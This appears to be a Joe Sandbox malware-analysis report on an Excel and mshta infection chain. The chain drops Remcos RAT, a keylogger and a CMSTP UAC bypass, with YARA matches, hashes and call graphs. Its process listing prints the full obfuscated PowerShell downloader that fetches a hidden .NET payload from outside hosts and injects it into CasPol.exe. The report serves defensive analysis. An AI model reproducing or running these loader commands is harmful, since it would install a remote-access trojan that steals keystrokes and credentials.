                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:30
                                                                                                            Start time:10:58:06
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:31
                                                                                                            Start time:10:58:12
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                            Imagebase:0x1140000
                                                                                                            File size:107'704 bytes
                                                                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:34
                                                                                                            Start time:10:58:29
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                            Imagebase:0x1140000
                                                                                                            File size:107'704 bytes
                                                                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                            Call Graph

                                                                                                            • Entrypoint
                                                                                                            • Decryption Function
                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            • Show Help
                                                                                                            callgraph 1 Error: Graph is empty

                                                                                                            Module: Sheet1

                                                                                                            Declaration
                                                                                                            LineContent
                                                                                                            1

                                                                                                            Attribute VB_Name = "Sheet1"

                                                                                                            2

                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                            3

                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                            4

                                                                                                            Attribute VB_Creatable = False

                                                                                                            5

                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                            6

                                                                                                            Attribute VB_Exposed = True

                                                                                                            7

                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                            8

                                                                                                            Attribute VB_Customizable = True

                                                                                                            Module: Sheet2

                                                                                                            Declaration
                                                                                                            LineContent
                                                                                                            1

                                                                                                            Attribute VB_Name = "Sheet2"

                                                                                                            2

                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                            3

                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                            4

                                                                                                            Attribute VB_Creatable = False

                                                                                                            5

                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                            6

                                                                                                            Attribute VB_Exposed = True

                                                                                                            7

                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                            8

                                                                                                            Attribute VB_Customizable = True

                                                                                                            Module: Sheet3

                                                                                                            Declaration
                                                                                                            LineContent
                                                                                                            1

                                                                                                            Attribute VB_Name = "Sheet3"

                                                                                                            2

                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                            3

                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                            4

                                                                                                            Attribute VB_Creatable = False

                                                                                                            5

                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                            6

                                                                                                            Attribute VB_Exposed = True

                                                                                                            7

                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                            8

                                                                                                            Attribute VB_Customizable = True

                                                                                                            Module: ThisWorkbook

                                                                                                            Declaration
                                                                                                            LineContent
                                                                                                            1

                                                                                                            Attribute VB_Name = "ThisWorkbook"

                                                                                                            2

                                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                            3

                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                            4

                                                                                                            Attribute VB_Creatable = False

                                                                                                            5

                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                            6

                                                                                                            Attribute VB_Exposed = True

                                                                                                            7

                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                            8

                                                                                                            Attribute VB_Customizable = True

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 036C0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000003.454133886.00000000036C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_3_36c0000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction ID: c5b2f95f45df17cee559b50390294f989fea89e60baa2a97a97a1ac92c6294bd
                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 036C0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000003.454133886.00000000036C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_3_36c0000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction ID: c5b2f95f45df17cee559b50390294f989fea89e60baa2a97a97a1ac92c6294bd
                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 036C0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000003.454133886.00000000036C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_3_36c0000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction ID: c5b2f95f45df17cee559b50390294f989fea89e60baa2a97a97a1ac92c6294bd
                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction Fuzzy Hash:

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:5.6%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:50%
                                                                                                              Total number of Nodes:6
                                                                                                              Total number of Limit Nodes:0
                                                                                                              execution_graph 2187 7fe89a359e1 2188 7fe89a359f1 URLDownloadToFileW 2187->2188 2190 7fe89a35b00 2188->2190 2191 7fe89a34b18 2192 7fe89a35a30 URLDownloadToFileW 2191->2192 2194 7fe89a35b00 2192->2194

                                                                                                              Executed Functions

                                                                                                              Function 000007FE89A34B18 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493305672.000007FE89A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89a30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DownloadFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1407266417-0
                                                                                                              • Opcode ID: eb3cb3c710e1f962fdbfb4e8a09f1ac99ee710c59bf72a27f278563d4b314540
                                                                                                              • Instruction ID: 31ac8733a684d324600d360e231bb64233f975748f8e96342b6421f7af8d0670
                                                                                                              • Opcode Fuzzy Hash: eb3cb3c710e1f962fdbfb4e8a09f1ac99ee710c59bf72a27f278563d4b314540
                                                                                                              • Instruction Fuzzy Hash: A4318171918A5C8FDB58DF5CD8897A9B7E1FB69711F00826ED04ED3661CB70A805CB81
                                                                                                              Function 000007FE89A359E1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493305672.000007FE89A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89a30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DownloadFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1407266417-0
                                                                                                              • Opcode ID: c6ee0bf9573666e773a847e77fd323e9982facfaef00df79e32ad92286ca6e6d
                                                                                                              • Instruction ID: 9a4f14232c1b2e059e178447856b2e11ce87e707a9bb793e2c1cb77754cb3312
                                                                                                              • Opcode Fuzzy Hash: c6ee0bf9573666e773a847e77fd323e9982facfaef00df79e32ad92286ca6e6d
                                                                                                              • Instruction Fuzzy Hash: 3241E47181DB889FDB19DB5C98447A9BBF0FB56321F0482AFD08DD7162CB246806C781
                                                                                                              Function 000007FE89B00F0D Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: R
                                                                                                              • API String ID: 0-1466425173
                                                                                                              • Opcode ID: 46a5a66f91ef81467d14d47e92d4cfdebc84e28e3e84ebaba732d50da30d5910
                                                                                                              • Instruction ID: 8e25000fd258da1d21747cc4f5d8e1c5f4ba938458d93b1fbeefcc2990dd12aa
                                                                                                              • Opcode Fuzzy Hash: 46a5a66f91ef81467d14d47e92d4cfdebc84e28e3e84ebaba732d50da30d5910
                                                                                                              • Instruction Fuzzy Hash: 8AB10220A0EBC94FE35B9B3C58602657FE1EF57254B1901EBC48DCB1B3D9189C5AC362
                                                                                                              Function 000007FE89B026E9 Relevance: .7, Instructions: 713COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 67 7fe89b026e9-7fe89b02799 68 7fe89b0279f-7fe89b027a9 67->68 69 7fe89b02c7d-7fe89b02d36 67->69 70 7fe89b027c2-7fe89b027c9 68->70 71 7fe89b027ab-7fe89b027b8 68->71 74 7fe89b027e0 70->74 75 7fe89b027cb-7fe89b027de 70->75 71->70 73 7fe89b027ba-7fe89b027c0 71->73 73->70 76 7fe89b027e2-7fe89b027e4 74->76 75->76 79 7fe89b02bf8-7fe89b02c02 76->79 80 7fe89b027ea-7fe89b027f6 76->80 81 7fe89b02c15-7fe89b02c25 79->81 82 7fe89b02c04-7fe89b02c14 79->82 80->69 83 7fe89b027fc-7fe89b02806 80->83 85 7fe89b02c32-7fe89b02c7c 81->85 86 7fe89b02c27-7fe89b02c2b 81->86 87 7fe89b02822-7fe89b02832 83->87 88 7fe89b02808-7fe89b02815 83->88 86->85 87->79 93 7fe89b02838-7fe89b0286c 87->93 88->87 89 7fe89b02817-7fe89b02820 88->89 89->87 93->79 99 7fe89b02872-7fe89b0287e 93->99 99->69 100 7fe89b02884-7fe89b0288e 99->100 101 7fe89b02890-7fe89b0289d 100->101 102 7fe89b028a7-7fe89b028ac 100->102 101->102 103 7fe89b0289f-7fe89b028a5 101->103 102->79 104 7fe89b028b2-7fe89b028b7 102->104 103->102 104->79 105 7fe89b028bd-7fe89b028c2 104->105 105->79 106 7fe89b028c8-7fe89b028d7 105->106 108 7fe89b028e7 106->108 109 7fe89b028d9-7fe89b028e3 106->109 112 7fe89b028ec-7fe89b028f9 108->112 110 7fe89b02903-7fe89b0298e 109->110 111 7fe89b028e5 109->111 119 7fe89b02990-7fe89b0299b 110->119 120 7fe89b029a2-7fe89b029c4 110->120 111->112 112->110 113 7fe89b028fb-7fe89b02901 112->113 113->110 119->120 121 7fe89b029d4 120->121 122 7fe89b029c6-7fe89b029d0 120->122 125 7fe89b029d9-7fe89b029e6 121->125 123 7fe89b029f0-7fe89b02a7e 122->123 124 7fe89b029d2 122->124 132 7fe89b02a80-7fe89b02a8b 123->132 133 7fe89b02a92-7fe89b02ab0 123->133 124->125 125->123 127 7fe89b029e8-7fe89b029ee 125->127 127->123 132->133 134 7fe89b02ac0 133->134 135 7fe89b02ab2-7fe89b02abc 133->135 138 7fe89b02ac5-7fe89b02ad3 134->138 136 7fe89b02abe 135->136 137 7fe89b02add-7fe89b02b6d 135->137 136->138 145 7fe89b02b6f-7fe89b02b7a 137->145 146 7fe89b02b81-7fe89b02bda 137->146 138->137 140 7fe89b02ad5-7fe89b02adb 138->140 140->137 145->146 149 7fe89b02be2-7fe89b02bf7 146->149
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9ce42bf2ef0d9ddff7c1eebb51274f8d0ce1c76ca0e05f3102c2d3a7ee48fa9
                                                                                                              • Instruction ID: da21b80e82cd7d34f0bfbe787b4c570a6ddf40273c282e2aef2a4e2bd5694b5f
                                                                                                              • Opcode Fuzzy Hash: a9ce42bf2ef0d9ddff7c1eebb51274f8d0ce1c76ca0e05f3102c2d3a7ee48fa9
                                                                                                              • Instruction Fuzzy Hash: 8422153090CB8D4FD7AADB6C84546797BE2FF9A344F2401AED44EC72A3CA24AC56C741

                                                                                                              Non-executed Functions

                                                                                                              Function 000007FE89B000DD Relevance: 1.4, Instructions: 1380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82b2c9c96c3f71a5455166433ede86a5b4ad22410a54174d1298ab514a63d445
                                                                                                              • Instruction ID: 6fb07f106e8104683f3d23280c39414b54757be268c0cb008349422c02c8973a
                                                                                                              • Opcode Fuzzy Hash: 82b2c9c96c3f71a5455166433ede86a5b4ad22410a54174d1298ab514a63d445
                                                                                                              • Instruction Fuzzy Hash: 5492043090DBCA4FE32AAB2858512B97FE1EF47254F1910EFD48FC71A3DA186856C395
                                                                                                              Function 000007FE89B03122 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 427 7fe89b03122-7fe89b031fb
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 87^
                                                                                                              • API String ID: 0-353096383
                                                                                                              • Opcode ID: d611122e3db4d1e68f32d9e35642bf669401cddecf814798b524f379def88f34
                                                                                                              • Instruction ID: 9d08828ed94ad2f73fc4c2de069cc21ef3f30df00ba07a3d0e75614ca427c1d2
                                                                                                              • Opcode Fuzzy Hash: d611122e3db4d1e68f32d9e35642bf669401cddecf814798b524f379def88f34
                                                                                                              • Instruction Fuzzy Hash: 14216A1090EBC50FE757A73829652A57FA1AF57258B1E00DBD489CF1B3D80C5D6AC3A2

                                                                                                              Executed Functions

                                                                                                              Function 03030FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000003.520685429.0000000003030000.00000010.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_3_3030000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction ID: b21362419a6b9b9fc046785df179d27ff54a215aa8f71ec586d89c9025f003c9
                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 03030FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000003.520685429.0000000003030000.00000010.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_3_3030000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction ID: b21362419a6b9b9fc046785df179d27ff54a215aa8f71ec586d89c9025f003c9
                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 03030FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000003.520685429.0000000003030000.00000010.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_3_3030000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction ID: b21362419a6b9b9fc046785df179d27ff54a215aa8f71ec586d89c9025f003c9
                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction Fuzzy Hash:

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.3%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:3.7%
                                                                                                              Total number of Nodes:627
                                                                                                              Total number of Limit Nodes:12
